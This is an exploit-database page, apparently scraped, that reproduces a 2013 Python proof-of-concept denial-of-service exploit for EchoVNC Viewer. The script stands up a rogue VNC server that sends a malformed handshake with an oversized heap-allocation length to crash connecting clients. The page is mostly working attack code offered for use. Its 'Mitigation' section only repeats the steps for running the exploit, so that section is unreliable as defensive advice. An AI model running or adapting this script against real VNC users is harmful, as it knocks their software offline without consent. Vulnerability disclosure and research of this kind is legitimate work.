header-logo
Suggest Exploit
vendor:
EchoVNC Viewer
by:
Z3r0n3
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: EchoVNC Viewer
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

EchoVNC Viewer Remote DoS Vulnerability

A remote attacker can crash EchoVNC Viewer by sending a malformed request. The crash occurs when EchoVNC Viewer allocate a buffer from heap with the size specified by the malicious server.

Mitigation:

Configure EchoVNC Viewer with the specified host/port and put the IP and press OK button on EchoVNC Viewer main window.
Source

Exploit-DB raw data:

#!/usr/bin/env python
#================================================================#
# [+] Title: EchoVNC Viewer Remote DoS Vulnerability             #
# [+] Discovered: 29/07/2013                                     #
# [+] Software Vendor: http://sourceforge.net/projects/echovnc/  #
# [+] Author: Z3r0n3 - Independent Security Researcher           #                                          
# [+] Contact: z3r0n3@mail.com                                   #
# [+] Overview:                                                  #
#   A remote attacker can crash EchoVNC Viewer by sending a      #
#   malformed request. the crash occurs when EchoVNC             #
#   Viewer allocate a buffer from heap with the size specified   #
#   by the malicious server.                                     #
# [+] NOTICE:                                                    #
#   You need to configure EchoVNC Viewer with the specified      #
#   host/port below.                                             #
#   When running the exploit, you need to put the IP and press   #
#   OK button on EchoVNC Viewer main window.                     #
#================================================================#

import socket, sys;

host="localhost" # Put the victim IP here
port=5900;
malreq=b"\x00\x00\x00\x00\x90\x90\x90\x90" # the first 4 bytes specifies if the
                                           # server needs authentication
                                           # \x00\x00\x00\x00 means the server
                                           # doesn't need user/password
                                           # the last 4 bytes specifies the
                                           # buffer size that will be allocated
                                           # in heap

print("[+] Creating socket...");
srv=socket.socket(socket.AF_INET, socket.SOCK_STREAM);
try:
    print("[+] Trying to bind..");
    srv.bind((host,port));
except socket.error:
    print("[!] Can't connect...");
    srv.close()
    sys.exit()

print("[+] Trying to listen to %s:%d"%(host,port));
srv.listen(5)
cnx, addr=srv.accept()
print("[+] Client connected %s:%s"%(addr[0], addr[1]))
print("[+] Sending protocol signature...");
cnx.send(b"RFB 003.008\n")
print("[+] Sending malformed request with huge size for heap allocation");
cnx.send(malreq);
cnx.close()
srv.close()
print("[x] EchoVNC Viewer should be down...");

Navigation

Suggest Exploit

Services By CQR